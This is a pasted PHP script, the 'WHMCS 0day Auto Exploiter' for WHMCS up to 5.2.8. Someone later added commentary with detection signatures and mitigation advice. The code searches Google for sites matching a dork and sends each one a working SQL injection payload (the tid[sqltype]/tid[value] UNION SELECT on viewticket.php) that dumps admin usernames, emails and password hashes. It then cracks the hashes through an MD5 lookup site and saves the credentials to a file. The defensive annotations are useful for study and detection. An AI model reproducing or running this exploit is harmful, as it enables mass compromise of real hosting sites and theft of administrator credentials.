Googleinurl

WHMCS 0day Auto Exploiter <= 5.2.8 - DECRYPT

Oct 22nd, 2013
  1. <?php
  2. /*
  3. *****************************************************
  4.         WHMCS 0day Auto Exploiter <= 5.2.8
  5.         Coded by g00n - Skype: t3hg00n
  6.         MD5 Decrypt by Cap'n V00D00 - Skype: capnsharkbait
  7.             wwww.xploiter.net
  8. *****************************************************
  9. Preview:
  10. http://i.imgur.com/qB726Gm.png
  11. In action:
  12. http://i.imgur.com/oNpZAf6.png
  13. http://i.imgur.com/gFlBjtD.png
  14. *****************************************************
  15. */
  16.  
  // Runtime setup for one long-running web request: the execution time limit
  // is removed, the memory limit is set to 64M and the response is declared as
  // UTF-8 HTML. Defender note: a PHP page in a web root that disables its own
  // time limit and then makes many outbound HTTP requests is a useful
  // hosting-side signal when hunting for scripts like this one.
  17. set_time_limit(0);
  18. ini_set('memory_limit', '64M');
  19. header('Content-Type: text/html; charset=UTF-8');
  // Flushes PHP's output buffer and then the system write buffer; the main
  // loop calls this after each result so output is sent while the run is
  // still in progress.
  20. function letItBy(){ ob_flush(); flush(); }
  /**
   * Looks up a popularity rank for a URL from a third-party XML endpoint.
   *
   * The URL is appended to the query string without encoding, and the second
   * SD element of the response is read. The main loop only uses the value to
   * label each logged site.
   *
   * @param string $url URL taken from a search result.
   * @return mixed The TEXT attribute of POPULARITY (a SimpleXML node), or 0
   *               when the second SD element is missing.
   */
  21. function getAlexa($url)
  22. {
  23.     $xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
  24.     $rank1 = $xml->SD[1];
  25.     if($rank1)
  26.         $rank = $rank1->POPULARITY->attributes()->TEXT;
  27.     else
  28.         $rank = 0;
  29.     return $rank;
  30. }
  31.  
  /**
   * Submits a hash to a public MD5 lookup site and scrapes the answer.
   *
   * Despite the name nothing is decrypted: the hash is POSTed to a third-party
   * service and the page is searched for its "Found:" marker. The 'a' form
   * field is sent as a fixed value whose meaning is not shown here.
   *
   * Defender notes: the caller feeds this the last colon-separated field of
   * each dumped admin row, i.e. the password column. That only pays off when
   * passwords are stored as unsalted MD5 (presumably the case for the
   * affected versions; confirm against the product). Any such hash that
   * leaves the database should be treated as a disclosed password and
   * rotated; salted, slow hashing (password_hash) defeats lookup services of
   * this kind.
   *
   * @param string $hash Hash string to look up.
   * @return string|false Recovered plaintext, or false when none was found.
   */
  32. function decryptmd5($hash){
  33.     $url = 'http://www.md5online.org/';
  34.     $data = array('md5' => $hash, 'action' => 'decrypt', 'a' => '73981820');
  35.     $options = array(
  36.         'http' => array(
  37.             'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
  38.             'method'  => 'POST',
  39.             'content' => http_build_query($data),
  40.         )
  41.     );
  42.     $context = stream_context_create($options);
  43.     $result = file_get_contents($url, false, $context);
      // Spaces and newlines are stripped first, which is why the marker below
      // is written without spaces ("<spanstyle=").
  44.     $result = str_replace("\n", '', str_replace(" ", '', $result));
  45.     $result = explode("<br/><spanstyle='color:limegreen'>Found:<b>", $result);
      // When the marker is absent, index 1 does not exist and the value
      // degrades to an empty result, which the return below maps to false.
  46.     $result = explode("</b>", $result[1]);
  47.  
  48.     return $result[0] ? $result[0] : false;
  49. }
  50.    
  /**
   * Fetches one page of web-search results for a query through a JSON search
   * endpoint (8 results per page, offset = page * 8).
   *
   * This is the target-discovery step: the main loop passes in an operator
   * supplied search query and walks up to 50 pages. http_get() is called with
   * its second argument true, which adds a one-second pause per request.
   *
   * Defender note: sites are selected purely because a search engine has
   * indexed a matching URL, so any publicly indexed installation of the
   * affected product is in scope for tools like this regardless of its size.
   *
   * @param string $query Search query.
   * @param int    $page  Result page number.
   * @return array|false The 'results' list, or false when the status is not
   *                     200 or the list is empty. Terminates the script via
   *                     die() when the response has no 'responseStatus' key.
   */
  51. function google_that($query, $page=1)
  52. {
  53.     $resultPerPage=8;
  54.     $start = $page*$resultPerPage;
  55.     $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
  56.     $resultFromGoogle = json_decode( http_get($url, true) ,true);
  57.     if(isset($resultFromGoogle['responseStatus'])) {
  58.         if($resultFromGoogle['responseStatus'] != '200') return false;
  59.         if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
  60.         else return $resultFromGoogle['responseData']['results'];
  61.     }
  62.     else
  63.         die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
  64. }
  65.    
  /**
   * Minimal cURL GET helper: 10-second connect timeout, follows redirects,
   * returns the body without headers.
   *
   * @param string $url      URL to fetch.
   * @param bool   $safemode When strictly true, sleeps one second first.
   * @return string|false Response body, or false if the transfer failed.
   */
  66. function http_get($url, $safemode = false){
  67.     if($safemode === true) sleep(1);
  68.     $im = curl_init($url);
  69.     curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  70.     curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  71.     curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  72.     curl_setopt($im, CURLOPT_HEADER, 0);
  73.     return curl_exec($im);
      // NOTE(review): the next line sits after the return and is never
      // reached; it also passes no handle.
  74.     curl_close();
  75. }
  76.  
  /**
   * Sends the injection request to one candidate site and extracts any
   * administrator rows that come back.
   *
   * What the code does: the search-result URL is rewritten to the sibling
   * viewticket.php (with "/admin" stripped), and a POST body is sent in which
   * the ticket id parameter `tid` is an array (keys `sqltype` and `value`)
   * instead of a scalar. The `value` element carries a UNION SELECT that
   * concatenates id, username, email and password from tbladmins between
   * ":::::" markers, and the response is searched for those markers.
   * Presumably the application hands the array to its query builder
   * unchecked; that code is not shown here.
   *
   * Detection (all taken from the request built below):
   *   - POSTs to viewticket.php where `tid` arrives as an array, or whose
   *     body contains "sqltype", "TABLEJOIN", "union select" or "tbladmins";
   *   - the fixed User-Agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)";
   *   - responses containing a ":::::" delimited run.
   *
   * Mitigation: move off the releases the header names as affected
   * (<= 5.2.8) to a vendor-fixed release (version not stated on this page);
   * reject non-scalar request parameters where a scalar id is expected; and
   * after any suspected hit, reset every admin password and review admin
   * sessions, since the row contents include the password hash.
   *
   * @param string $url A search-result URL on the candidate site.
   * @return array|string List of ":::::"-delimited matches, or the string
   *                      "Fail!" when nothing matched or cURL init failed.
   */
  77. function check_vuln($url) {
  78. $url = dirname($url) . '/viewticket.php';
  79. $url = str_replace("/admin","",$url);
  80.  
  81. $post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
  82. $curl_connection = curl_init($url);
  83. if($curl_connection != false) {
  84.     curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
  85.     curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
  86.     curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
      // Certificate verification is switched off, so HTTPS sites are
      // contacted whatever certificate they present.
  87.     curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
  88.     curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
      // Setting POSTFIELDS makes cURL issue the request as a POST.
  89.     curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
  90.     $source = curl_exec($curl_connection);
  91.     preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
  92.     if($infoz[0]) {
  93.         return $infoz[0];
  94.     }
  95.     else
  96.         return "Fail!";
  97. }
  98. else
  99.     return "Fail!";
  100. }
  101. ?>
  102. <html>
  103. <head>
  104. <title>WHMCS Auto Xploiter - by g00n</title>
  105. </head>
  106. <body style="background-image: url('http://i.imgur.com/zHNCk2e.gif'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
  107.  
  108. <STYLE>
  109. textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid #000000;}
  110. input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20}
  111. body {
  112. font-family: Tahoma
  113. }
  114. tr {
  115. BORDER: dashed 1px #333;
  116. color: #FFF;
  117. }
  118. td {
  119. BORDER: dashed 1px #333;
  120. color: #FFF;
  121. }
  122. .table1 {
  123. BORDER: 0px Black;
  124. BACKGROUND-COLOR: Black;
  125. color: #FFF;
  126. }
  127. .td1 {
  128. BORDER: 0px;
  129. BORDER-COLOR: #333333;
  130. font: 7pt Verdana;
  131. color: Green;
  132. }
  133. .tr1 {
  134. BORDER: 0px;
  135. BORDER-COLOR: #333333;
  136. color: #FFF;
  137. }
  138. table {
  139. BORDER: dashed 1px #333;
  140. BORDER-COLOR: #333333;
  141. BACKGROUND-COLOR: Black;
  142. color: #FFF;
  143. }
  144. input {
  145. border          : dashed 1px;
  146. border-color        : #333;
  147. BACKGROUND-COLOR: Black;
  148. font: 8pt Verdana;
  149. color: Red;
  150. }
  151. select {
  152. BORDER-RIGHT:  Black 1px solid;
  153. BORDER-TOP:    #DF0000 1px solid;
  154. BORDER-LEFT:   #DF0000 1px solid;
  155. BORDER-BOTTOM: Black 1px solid;
  156. BORDER-color: #FFF;
  157. BACKGROUND-COLOR: Black;
  158. font: 8pt Verdana;
  159. color: Red;
  160. }
  161. submit {
  162. BORDER:  buttonhighlight 2px outset;
  163. BACKGROUND-COLOR: Black;
  164. width: 30%;
  165. color: #FFF;
  166. }
  167. textarea {
  168. border          : dashed 1px #333;
  169. BACKGROUND-COLOR: Black;
  170. font: Fixedsys bold;
  171. color: #999;
  172. }
  173. BODY {
  174.     SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
  175. margin: 1px;
  176. color: Red;
  177. background-color: Black;
  178. }
  179. .main {
  180. margin          : -287px 0px 0px -490px;
  181. BORDER: dashed 1px #333;
  182. BORDER-COLOR: #333333;
  183. }
  184. .tt {
  185. background-color: Black;
  186. }
  187.  
  188. A:link {
  189.     COLOR: White; TEXT-DECORATION: none
  190. }
  191. A:visited {
  192.     COLOR: White; TEXT-DECORATION: none
  193. }
  194. A:hover {
  195.     color: Red; TEXT-DECORATION: none
  196. }
  197. A:active {
  198.     color: Red; TEXT-DECORATION: none
  199. }
  200.  
  201. #result{margin:10px;}
  202. #result span{display:block;}
  203. #result .Y{background-color:green;}
  204. #result .X{background-color:red;}
  205. </STYLE>
  206. <script language=\'javascript\'>
  // UI helpers that show, hide or toggle an element by id and record the
  // state in a cookie named after the id. NOTE(review): the quotes are
  // backslash-escaped as if this text had been lifted out of a PHP string;
  // served as-is this is not valid JavaScript, and nothing else on the page
  // calls these functions.
  207. function hide_div(id)
  208. {
  209.   document.getElementById(id).style.display = \'none\';
  210.   document.cookie=id+\'=0;\';
  211. }
  212. function show_div(id)
  213. {
  214.   document.getElementById(id).style.display = \'block\';
  215.   document.cookie=id+\'=1;\';
  216. }
  217. function change_divst(id)
  218. {
  219.   if (document.getElementById(id).style.display == \'none\')
  220.     show_div(id);
  221.   else
  222.     hide_div(id);
  223. }
  224. </script>
  225. </td></table></tr>
  226. <br>
  227. <br>
  228. <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
  229.     <style>
  230.       body {
  231.         font-family: 'Audiowide', serif;
  232.         font-size: 30px;
  233.        
  234.       }
  235.     </style>
  236.   </head>
  237.  
  238.   <body onLoad="type_text()" ; bgColor=#000000 text=#00FFFF background="Fashion fuchsia">
  239.     <center>
  240. <font face="Audiowide" color="red">WHMCS Auto Xploiter <font color="green">(0day)</font>
  241. <br>
  242. <font color="white" size="4">[For WHMCS ver. <= </font><font color="green" size="4">5.2.8</font><font color="white" size="4">]</font>
  243. </font>
  244. <br><br>
  245.  
  246. <table border=1 bordercolor=red>
  247. <tr>
  248. <td width="700">
  249. <br />
  250. <center>
  251.     <form method="post">
  252.         Google Dork: &nbsp;&nbsp;
  253.         <input type="text" id="dork" size="30" name="dork" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'inurl:submitticket.php'; ?>" />
  254.         &nbsp;&nbsp;<input type="submit" value="Xploit!" id="button"/>
  255.     </form>
  256. <?php
       // Main driver, run when the form posts a non-empty 'dork' value.
       // Flow: walk up to 50 pages of search results; for each result call
       // check_vuln() and getAlexa(); on success pass the last colon-separated
       // field of each returned row to decryptmd5(), append the record to a
       // local text file and echo it to the page.
       //
       // Defender / forensics notes:
       //   - "WMCS-Hashes.txt" is opened in append mode relative to the
       //     script's working directory. Finding a file with that name next to
       //     a PHP page like this one shows the tool was run on that host, and
       //     its contents list the sites and admin records that were taken.
       //   - Every record written there holds admin id, username, email and
       //     either the password hash or its recovered plaintext, so each
       //     listed site needs its admin credentials reset.
       //   - NOTE(review): search-result titles and URLs and the returned row
       //     data are echoed into the page without HTML escaping; analysts
       //     replaying a captured copy should view its output as text only.
  257.     if(isset($_POST['dork']{0})) {
  258.         $file = fopen("WMCS-Hashes.txt","a");
  259.         echo '<br /><div id="result"><b>Scanning has been started... Good luck! ;)</b><br><br>';           
  260.         letItBy();         
  261.         for($googlePage = 1; $googlePage <= 50; $googlePage++) {
  262.             $googleResult = google_that($_POST['dork'], $googlePage);
  263.             if(!$googleResult) {
  264.                 echo 'Finished scanning.';
  265.                 fclose($file);
  266.                 break;
  267.             }
  268.            
  269.             for($victim = 0; $victim < sizeof($googleResult); $victim++){
  270.                 $result = check_vuln($googleResult[$victim]['unescapedUrl']);
  271.                 $alexa = getAlexa($googleResult[$victim]['unescapedUrl']);
  272.                 if($result != "Fail!") {
  273.                     $hashes = "";
  274.                     $hashes2 = "";
  275.                     foreach ($result as $record) {
  276.                         $hashes = $hashes . str_replace(':::::','',$record) . "\n";
  277.  
  278.                         foreach(explode("\n",$hashes) as $indx => $hash){
  279.                             $hash = explode(":",$hash);
  280.                             $dcrpt = decryptmd5($hash[count($hash)-1]);
  281.                             $hash[count($hash)-1] = $dcrpt ? $dcrpt : $hash[count($hash)-1];
  282.                             $hashes2 .= implode(':',$hash);
  283.                         }
  284.  
  285.                     }
  286.                     $hashes = $hashes2;
  287.                     $sep = "========================================================\n";
  288.                     $data = $sep . $googleResult[$victim]['unescapedUrl'] . " - Alexa: " .$alexa. "\n" . $sep . $hashes . "\n";
  289.                     fwrite($file,$data);
  290.                     echo "<br /><font color=\"green\">Successfully Xploited...</font>";
  291.                     echo '<span class="Y">';
  292.                     echo "<pre>" . $data . "</pre></span><br />";
  293.                    
  294.                 }
  295.                 else {
  296.                 echo '<span class="X">';
  297.                 echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a> - <font color=\"black\">Failed!</font>";
  298.                 echo "</span>\n<br />";
  299.                 }
  300.                 letItBy();
  301.             }
  302.         }
  303.         echo '</div>';
  304.     }
  305. ?>
  306. </center>
  307. </td>
  308. </table>
  309. <br /><br />
  310. <font face="Audiowide" color="red" size="2">
  311. Coded by: <font color="white">g00n</font> <font color="white">|</font> Skype: <font color="white"><a href="Skype:t3hg00n">t3hg00n</a></font><br />
  312. MD5 Decrypt by: <font color="white">Cap'n V00d00</font> <font color="white">|</font> Skype: <font color="white"><a href="Skype:capnsharkbait">capnsharkbait</a></font><br /><br />
  313. <br > <font color="green">For more tools/scripts/exploits/etc.</font>
  314. <br />visit <a href="http://xploiter.net" target="_blank" style="text-decoration: none;">www.Xploiter.net</a>
  315. </font>
  316.  
  317. </center>
  318. </body>
  319. </html>